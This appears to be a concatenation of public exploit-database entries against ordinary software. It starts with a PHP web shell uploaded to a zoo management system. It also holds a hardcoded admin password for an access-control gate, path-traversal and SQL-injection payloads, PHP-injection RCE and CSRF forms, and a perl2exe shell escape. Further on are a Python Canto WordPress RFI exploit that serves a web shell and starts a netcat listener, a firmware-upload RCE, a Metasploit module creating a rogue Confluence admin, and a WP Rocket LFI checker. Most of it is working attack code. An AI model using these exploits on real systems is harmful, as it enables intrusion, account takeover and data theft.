max-width: 850px;
}
pre,
input,
button {
padding: 10px;
border-radius: 5px;
background-color: #efefef;
}
label {
display: block;
}
input {
width: 100%;
background-color: #efefef;
border: 2px solid transparent;
}
input:focus {
outline: none;
background: transparent;
border: 2px solid #e6e6e6;
}
button {
border: none;
cursor: pointer;
margin-left: 5px;
}
button:hover {
background-color: #e6e6e6;
}
.form-group {
display: -webkit-box;
display: -ms-flexbox;
display: flex;
padding: 15px 0;
}
</style>
</head>
<body>
<main>
<h1>Web Shell</h1>
<h2>Execute a command</h2>
<form method="post">
<label for="cmd"><strong>Command</strong></label>
<div class="form-group">
<input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>"
onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required>
<button type="submit">Execute</button>
</div>
</form>
<?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>
<h2>Output</h2>
<?php if (isset($cmd)): ?>
<pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre>
<?php else: ?>
<pre><small>No result.</small></pre>
<?php endif; ?>
<?php endif; ?>
</main>
</body>
</html>
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_med_record"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_transfer"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_transfer_reason"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_death_date"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_death_cause"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_incineration"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_gest_period"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_category"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_avg_body_temp"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_nest_const"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_clutch_size"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_wingspan"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_color_variant"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_body_temp"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_water_type"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_color_variant"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="rep_type"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="clutch_size"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="num_offspring"
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="submit"
------WebKitFormBoundary8NY8zT5dXIloiUML--
## After the post request sent by an attacker, the malicious file can be seen under the http://localhost/zoomanagementsystem/img/animals/. the attacker can execute arbitrary command on http://localhost/zoomanagementsystem/img/animals/ultra_1697442648.php.
# Exploit Title: Automatic-Systems SOC FL9600 FastLine - The device contains hardcoded login and password for super admin
# Google Dork:
# Date: 12/9/2023
# Exploit Author: Mike Jankowski-Lorek, Marcin Kozlowski / Cqure
# Vendor Homepage: http://automatic-systems.com
# Software Link:
# Version: V06
# Tested on: V06, VersionSVN = 28569_8a99acbd8d7ea09a57d5fbcb435da5427b3f6b8a
# CVE : CVE-2023-37608
An issue in Automatic Systems SOC FL9600 FastLine version:V06 a remote attacker to obtain sensitive information via the admin login credentials.
The device contains hardcoded login and password for super admin. The administrator cannot change the password for this account.
Login: automaticsystems
Password: astech
# Exploit Title: Automatic-Systems SOC FL9600 FastLine - Directory Transversal
# Google Dork:
# Date: 12/9/2023
# Exploit Author: Mike Jankowski-Lorek, Marcin Kozlowski / Cqure
# Vendor Homepage: http://automatic-systems.com
# Software Link:
# Version: V06
# Tested on: V06, VersionSVN = 28569_8a99acbd8d7ea09a57d5fbcb435da5427b3f6b8a
# CVE : CVE-2023-37607
Request URL: http://<host>/csvServer.php?getList=1&dir=../../../../etc/&file=passwd
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.:. Exploit Title > SuperStoreFinder - Multiple Vulnerabilities
.:. Google Dorks .:.
"designed and built by Joe Iz."
"Super Store Finder is designed and built by Joe Iz from Highwarden Huntsman."
inurl:/superstorefinder/index.php
.:. Date: 0ctober 13, 2023
.:. Exploit Author: bRpsd
.:. Contact: cy[at]live.no
.:. Vendor -> https://www.superstorefinder.net/
.:. Product -> https://codecanyon.net/item/super-store-finder/3630922
.:. Product Version -> [3.7 and below]
.:. DBMS -> MySQL
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#############
|DESCRIPTION|
#############
"Super Store Finder is a multi-language fully featured PHP/Javascript/MySQL store locator script integrated with the latest Google Maps API that allows customers to locate your stores easily. Packed with great features such as Geo Location, Drag and Drop Marker, Bulk Import and Geo code, Google Street View, Google Maps Direction and it is customizable and stylable (with extensible themes/add-ons, custom colors and maps design using snazzymaps.com). The store finder will be able to list nearby stores / outlets around your web visitors from nearest to the furthest distance away. Your customers will never be lost again getting to your stores / locations"
Vulnerability 1: Unauthenticated SQL Injection
Types: boolean-based blind,error-based, time-based blind
File: localhost/admin/index.php
Vul Parameter: USERNAME [POST]
===========================================================================================
Vulnerability 1: Unauthenticated SQL Injection
Types: boolean-based blind,error-based, time-based blind
File: localhost/admin/index.php
Vul Parameter: USERNAME [POST]
Test #1
http://localhost:9000/adminstorefinder/admin/index.php
username=a'&password=1&btn_login=Login
Response Error:
Array
(
[0] => Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 1
)
SELECT users.* FROM users WHERE users.username='admin''
===========================================================================================
Test #2 => Payload (Proof Of Concept)
http://localhost:9000/adminstorefinder/admin/index.php
username=a' AND GTID_SUBSET(CONCAT(0x7162766b71,(SELECT (CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END)),0x7170707071),3239)-- Seaj
&password=1&btn_login=Login
Response Error:
Array
(
[0] => Invalid query: FUNCTION adminstorefinder.JSON_STORAGE_FREE does not exist
)
===========================================================================================
======================================================================================================================================================================================
Vulnerability 2: Authenticated PHP Injection - Remote Code Exectuion
File: localhost/admin/settings.php
Vul Parameter: language_set [POST]
Proof of concept:
http://localhost:9000/superstorefinder/admin/settings.php
langset=en_US&language_set=en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);//&distance_set=mi&init_zoom=0&zoomhere_zoom=0&geo_settings=0&default_location=New York, US&style_map_color=rgba(0,0,0,1)&style_map_code=94102&style_top_bar_bg=rgba(0,0,0,1)&style_top_bar_font=rgba(0,0,0,1)&style_top_bar_border=rgba(0,0,0,1)&style_results_bg=rgba(0,0,0,1)&style_results_hl_bg=rgba(0,0,0,1)&style_results_hover_bg=rgba(0,0,0,1)&style_results_font=rgba(0,0,0,1)&style_results_distance_font=rgba(0,0,0,1)&style_distance_toggle_bg=rgba(0,0,0,1)&style_contact_button_bg=rgba(0,0,0,1)&style_contact_button_font=rgba(0,0,0,1)&style_button_bg=rgba(0,0,0,1)&style_button_font=rgba(0,0,0,1)&style_list_number_bg=rgba(0,0,0,1)&style_list_number_font=rgba(0,0,0,1)&save=1
Index.php included in the config.inc.php , we just can go for rce
with GET parameter ?cmd=
http://localhost:9000/?cmd=uname -a
Reponse:
22.2.0 Darwin Kernel Version 22.2.0: Fri Nov 11 02:08:47 PST 2022; root:xnu-8792.61.2~4/RELEASE_X86_64 x86_64
===========================================================================================
===========================================================================================
Vulnerability 3: Cross Site Request Forgery
Risk: It can lead to Privilege Escalation through adding admins or changing admin password.
Affected Files (1): localhost/superstorefinder/admin/users_add.php
Parameters: username,password,cpassword
Proof of concept:
<iframe style="display:none" name="CSRF"></iframe>
<form method='POST' action='http://localhost:9000/superstorefinder/admin/users_add.php' target="CSRF" id="CSRF">
<input name="submit_hidden" value="submit_hidden" type="hidden" />
<input type='hidden' name='username' value='X'>
<input type='hidden' name='password' value='123'>
<input type='hidden' name='cpassword' value='123'>
<input type='hidden' value='submit'>
</form>
<script>document.getElementById("CSRF").submit()</script>
<iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe>
Affected Files (2:):localhost/superstorefinder/admin/change_password.php
Parameters: password,cpassword,save
Proof of concept:
<iframe style="display:none" name="CSRF"></iframe>
<form method='POST' action='http://localhost:9000/superstorefinder/admin/users_add.php' target="CSRF" id="CSRF">
<input type='hidden' name='password' value='123'>
<input type='hidden' name='cpassword' value='123'>
<input type='hidden' name="save=" value='save'>
</form>
<script>document.getElementById("CSRF").submit()</script>
<iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe>
======================================================================================
# Exploit Title: Executables Created with perl2exe <= V30.10C - Arbitrary Code Execution
# Date: 10/17/2023
# Exploit Author: decrazyo
# Vendor Homepage: https://www.indigostar.com/
# Software Link: https://www.indigostar.com/download/p2x-30.10-Linux-x64-5.30.1.tar.gz
# Version: <= V30.10C
# Tested on: Ubuntu 22.04
# Description:
perl2exe packs perl scripts into native executables.
Those executables use their 0th argument to locate a file to unpack and execute.
Because of that, such executables can be made to execute another executable that has been compiled with perl2exe by controlling the 0th argument.
That can be useful for breaking out of restricted shell environments.
# Proof and Concept:
user@testing:~/example$ ls
p2x-30.10-Linux-x64-5.30.1.tar.gz perl2exe-Linux-x64-5.30.1
user@testing:~/example$
user@testing:~/example$ # Create and pack a "safe" perl script to target with the attack.
user@testing:~/example$ echo 'print("I am completely safe\n");' > safe.pl
user@testing:~/example$ ./perl2exe-Linux-x64-5.30.1/perl2exe safe.pl
Perl2Exe V30.10C 2020-12-11 Copyright (c) 1997-2020 IndigoSTAR Software
...
Generating safe
user@testing:~/example$
user@testing:~/example$ # Check that the program executes as expected.
user@testing:~/example$ ./safe
I am completely safe
user@testing:~/example$
user@testing:~/example$ # Create and pack a "malicious" script that we want to execute.
user@testing:~/example$ echo 'print("j/k I am malicious AF\n");system("/bin/sh");' > malicious.pl
user@testing:~/example$ ./perl2exe-Linux-x64-5.30.1/perl2exe malicious.pl
Perl2Exe V30.10C 2020-12-11 Copyright (c) 1997-2020 IndigoSTAR Software
...
Generating malicious
user@testing:~/example$
user@testing:~/example$ # Our "malicious" file doesn't need to have execution permissions.
user@testing:~/example$ chmod -x malicious
user@testing:~/example$ ./malicious
-bash: ./malicious: Permission denied
user@testing:~/example$
user@testing:~/example$ # Execute the "safe" program with the name of the "malicious" program as the 0th argument.
user@testing:~/example$ # The "safe" program will unpack and execute the "malicious" program instead of itself.
user@testing:~/example$ bash -c 'exec -a malicious ./safe'
j/k I am malicious AF
$ pstree -s $$
systemd───sshd───sshd───sshd───bash───safe───sh───pstree
$
# Exploit Title: Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)
# Date: 04/11/2023
# Exploit Author: Leopoldo Angulo (leoanggal1)
# Vendor Homepage: https://wordpress.org/plugins/canto/
# Software Link: https://downloads.wordpress.org/plugin/canto.3.0.4.zip
# Version: All versions of Canto Plugin prior to 3.0.5
# Tested on: Ubuntu 22.04, Wordpress 6.3.2, Canto Plugin 3.0.4
# CVE : CVE-2023-3452
#PoC Notes:
#The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. (Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-3452)
#This code exploits the improper handling of the wp_abspath variable in the following line of the "download.php" code:
#... require_once($_REQUEST['wp_abspath'] . '/wp-admin/admin.php'); ...
#This is just an example but there is this same misconfiguration in other lines of the vulnerable plugin files.
# More information in Leoanggal1's Github
#!/usr/bin/python3
import argparse
import http.server
import socketserver
import threading
import requests
import os
import subprocess
# Define the default web shell
default_web_shell = "<?php system($_GET['cmd']); ?>"
def create_admin_file(local_dir, local_shell=None):
if not os.path.exists(local_dir):
os.makedirs(local_dir)
# If a local shell is provided, use it; otherwise, use the default web shell
if local_shell:
with open(f"{local_dir}/admin.php", "wb") as admin_file:
with open(local_shell, "rb") as original_file:
admin_file.write(original_file.read())
else:
with open(f"{local_dir}/admin.php", "w") as admin_file:
admin_file.write(default_web_shell)
def start_local_server(local_port):
Handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(("0.0.0.0", local_port), Handler)
print(f"Local web server on port {local_port}...")
httpd.serve_forever()
return httpd
def exploit_rfi(url, local_shell, local_host, local_port, command, nc_port):
local_dir = "wp-admin"
create_admin_file(local_dir, local_shell)
target_url = f"{url}/wp-content/plugins/canto/includes/lib/download.php"
local_server = f"http://{local_host}:{local_port}"
command = f"cmd={command}"
if local_shell:
# If a local shell is provided, start netcat on the specified port
subprocess.Popen(["nc", "-lvp", str(nc_port)])
server_thread = threading.Thread(target=start_local_server, args=(local_port,))
server_thread.daemon = True
server_thread.start()
exploit_url = f"{target_url}?wp_abspath={local_server}&{command}"
print(f"Exploitation URL: {exploit_url}")
response = requests.get(exploit_url)
print("Server response:")
print(response.text)
# Shutdown the local web server
print("Shutting down local web server...")
server_thread.join()
if __name__ == "__main__":
examples = '''
Examples:
- Check the vulnerability
python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33
- Execute a command
python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -c 'id'
- Upload and run a reverse shell file. You can download it from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php or generate it with msfvenom.
python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -s php-reverse-shell.php
'''
parser = argparse.ArgumentParser(description="Script to exploit the Remote File Inclusion vulnerability in the Canto plugin for WordPress - CVE-2023-3452", epilog=examples, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("-u", "--url", required=True, default=None, help="Vulnerable URL")
parser.add_argument("-s", "--shell", help="Local file for web shell")
parser.add_argument("-LHOST", "--local_host", required=True, help="Local web server IP")
parser.add_argument("-LPORT", "--local_port", help="Local web server port")
parser.add_argument("-c", "--command", default="whoami", help="Command to execute on the target")
parser.add_argument("-NC_PORT", "--nc_port", type=int, help="Listener port for netcat")
try:
args = parser.parse_args()
if args.local_port is None:
args.local_port = 8080 # Valor predeterminado si LPORT no se proporciona
exploit_rfi(args.url, args.shell, args.local_host, int(args.local_port), args.command, args.nc_port)
except SystemExit:
parser.print_help()
TEM Opera Plus FM Family Transmitter 35.45 Remote Code Execution
Vendor: Telecomunicazioni Elettro Milano (TEM) S.r.l.
Product web page: https://www.tem-italy.it
Affected version: Software version: 35.45
Webserver version: 1.7
Summary: This new line of Opera plus FM Transmitters combines very
high efficiency, high reliability and low energy consumption in compact
solutions. They have innovative functions and features that can eliminate
the costs required by additional equipment: automatic exchange of audio
sources, built-in stereo encoder, integrated RDS encoder, parallel I/O
card, connectivity through GSM telemetry and/or TCP IP / SNMP / SMTP
Webserver.
Desc: The device allows access to an unprotected endpoint that allows
MPFS File System binary image upload without authentication. The MPFS2
file system module provides a light-weight read-only file system that
can be stored in external EEPROM, external serial Flash, or internal
Flash program memory. This file system serves as the basis for the
HTTP2 web server module, but is also used by the SNMP module and is
available to other applications that require basic read-only storage
capabilities. This can be exploited to overwrite the flash program
memory that holds the web server's main interfaces and execute arbitrary
code.
Tested on: Webserver
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5799
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5799.php
18.08.2023
--
POST /mpfsupload HTTP/1.1
Host: 192.168.1.2:8000
Content-Length: 251
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----joxypoxy2
User-Agent: MPFS2_PoC/2.0c
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------joxypoxy2
Content-Disposition: form-data; name="i"; filename="MPFSimg2.bin"
Content-Type: application/octet-stream
MPFS...<CGI BINARY PHONE HOME>
-----joxypoxy2--
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
<html><body style="margin:100px"><b>MPFS Update Successful</b><p><a href="/">Site main page</a></body></html>
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control',
'Description' => %q{
This module exploits a broken access control vulnerability in Atlassian Confluence servers leading to an authentication bypass.
A specially crafted request can be create new admin account without authentication on the target Atlassian server.
},
'Author' => [
'Unknown', # exploited in the wild
'Emir Polat' # metasploit module
],
'References' => [
['CVE', '2023-22515'],
['URL', 'https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-22515'],
['URL', 'https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis']
],
'DisclosureDate' => '2023-10-04',
'DefaultOptions' => {
'RPORT' => 8090
},
'License' => MSF_LICENSE,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/']),
OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /^[a-z._@]+$/),
OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]),
OptString.new('NEW_EMAIL', [true, 'E-mail to be used when creating a new user with admin privileges', Faker::Internet.email])
])
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/login.action')
)
return Exploit::CheckCode::Unknown unless res
return Exploit::CheckCode::Safe unless res.code == 200
poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text
return Exploit::CheckCode::Safe unless poweredby =~ /Confluence (\d+(\.\d+)*)/
confluence_version = Rex::Version.new(Regexp.last_match(1))
vprint_status("Detected Confluence version: #{confluence_version}")
if confluence_version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.3.2')) ||
confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.2')) ||
confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.1'))
return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}")
end
Exploit::CheckCode::Safe("Confluence version: #{confluence_version}")
end
def run
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/server-info.action'),
'vars_get' => {
'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false'
}
)
return fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Version vulnerable but setup is already completed') unless res&.code == 302 || res&.code == 200
print_good('Found server-info.action! Trying to ignore setup.')
created_user = create_admin_user
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'setup/finishsetup.action'),
'headers' => {
'X-Atlassian-Token' => 'no-check'
}
)
return fail_with(Msf::Exploit::Failure::NoAccess, 'The admin user could not be created. Try a different username.') unless created_user
print_warning('Admin user was created but setup could not be completed.') unless res&.code == 200
create_credential({
workspace_id: myworkspace_id,
origin_type: :service,
module_fullname: fullname,
username: datastore['NEW_USERNAME'],
private_type: :password,
private_data: datastore['NEW_PASSWORD'],
service_name: 'Atlassian Confluence',
address: datastore['RHOST'],
port: datastore['RPORT'],
protocol: 'tcp',
status: Metasploit::Model::Login::Status::UNTRIED
})
print_good("Admin user was created successfully. Credentials: #{datastore['NEW_USERNAME']} - #{datastore['NEW_PASSWORD']}")
print_good("Now you can login as administrator from: http://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}login.action")
end
def create_admin_user
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'setup/setupadministrator.action'),
'headers' => {
'X-Atlassian-Token' => 'no-check'
},
'vars_post' => {
'username' => datastore['NEW_USERNAME'],
'fullName' => 'New Admin',
'email' => datastore['NEW_EMAIL'],
'password' => datastore['NEW_PASSWORD'],
'confirm' => datastore['NEW_PASSWORD'],
'setup-next-button' => 'Next'
}
)
res&.code == 302
end
end
<!--
TEM Opera Plus FM Family Transmitter 35.45 XSRF
Vendor: Telecomunicazioni Elettro Milano (TEM) S.r.l.
Product web page: https://www.tem-italy.it
Affected version: Software version: 35.45
Webserver version: 1.7
Summary: This new line of Opera plus FM Transmitters combines very
high efficiency, high reliability and low energy consumption in compact
solutions. They have innovative functions and features that can eliminate
the costs required by additional equipment: automatic exchange of audio
sources, built-in stereo encoder, integrated RDS encoder, parallel I/O
card, connectivity through GSM telemetry and/or TCP IP / SNMP / SMTP
Webserver.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: Webserver
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5800
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5800.php
18.08.2023
-->
CSRF Change Forward Power:
-------------------------
<html>
<body>
<form action="http://192.168.1.2:8000/user/postcmd.htm" method="POST" enctype="text/plain">
<input type="hidden" name="Pwr" value="00100" />
<input type="submit" value="Change" />
</form>
</body>
</html>
CSRF Change Frequency:
---------------------
<html>
<body>
<form action="http://192.168.1.2:8000/user/postcmd.htm" method="POST" enctype="text/plain">
<input type="hidden" name="Freq" value="95.5" />
<input type="submit" value="Change" />
</form>
</body>
</html>
CSRF Change User/Pass/Priv Change Admin/User/Pass:
-------------------------------------------------
<html>
<body>
<form action="http://192.168.1.2:8000/protect/accounts.htm" method="POST">
<input type="hidden" name="usr0" value="admin" />
<input type="hidden" name="psw0" value="admin" />
<input type="hidden" name="usr1" value="operator1" />
<input type="hidden" name="psw1" value="operator1" />
<input type="hidden" name="lev1" value="1" />
<input type="hidden" name="usr2" value="operator2" />
<input type="hidden" name="psw2" value="operator2" />
<input type="hidden" name="lev2" value="1" />
<input type="hidden" name="usr3" value="consulter1" />
<input type="hidden" name="psw3" value="consulter1" />
<input type="hidden" name="lev3" value="2" />
<input type="hidden" name="usr4" value="consulter2" />
<input type="hidden" name="psw4" value="consulter2" />
<input type="hidden" name="lev4" value="2" />
<input type="hidden" name="usr5" value="consulter3" />
<input type="hidden" name="psw5" value="consulter3" />
<input type="hidden" name="lev5" value="2" />
<input type="submit" value="Change" />
</form>
</body>
</html>
Paulos Yibelo discovered and reported this Local File Inclusion vulnerability in WordPress WP Rocket Plugin. This could allow a malicious actor to include local files of the target website and show its output onto the screen. Files which store credentials, such as database credentials, could potentially allow complete database takeover depending on the configuration. This vulnerability has been fixed in version 2.10.4.
https://patchstack.com/database/vulnerability/wp-rocket/wordpress-wp-rocket-plugin-2-10-3-local-file-inclusion-lfi-vulnerability
https://vulners.com/wpvulndb/WPVDB-ID:5484D821-7017-47A8-90D8-7D87CB5E0E50
Exploit :
#Code By E1.Coders
#Dork : "Powered by WP Rocket" filetype:php intitle:"WP Rocket Configuration" -"in" -"dirlist"
Dork : http://example.com/wp-content/plugins/wp-rocket/inc/functions/min/v2.10.3/min/min.php
import requests
import time
def check_wp_rocket_version(url):
version_url = url + "/wp-rocket/css/rocket.css"
try:
response = requests.get(version_url)
version = response.headers["X-Powered-By"]
if "WP Rocket/" in version:
version = version.split("/")[1]
return version
except Exception as e:
print(f"Error occurred while fetching WP Rocket version: {e}")
return None
def test_wp_rocket_lfi_bug(url):
lfi_url = url + "/wp-rocket/inc/vendor/composer/installed.json"
try:
response = requests.get(lfi_url)
if response.status_code == 200:
return True
except Exception as e:
print(f"Error occurred while testing LFI: {e}")
return False
def main():
url = "http://arvatools.com"
wp_rocket_version = check_wp_rocket_version(url)
if wp_rocket_version:
print(f"WP Rocket Version: {wp_rocket_version}")
if wp_rocket_version in ["2.10.0", "2.10.1", "2.10.2", "2.10.3"]:
result = test_wp_rocket_lfi_bug(url)
if result:
print("LFI vulnerability found in WP Rocket")
else:
print("LFI vulnerability not found in WP Rocket")
else:
print("WP Rocket version is not affected by the LFI bug")
else:
print("Unable to fetch WP Rocket version")
if __name__ == "__main__":
main()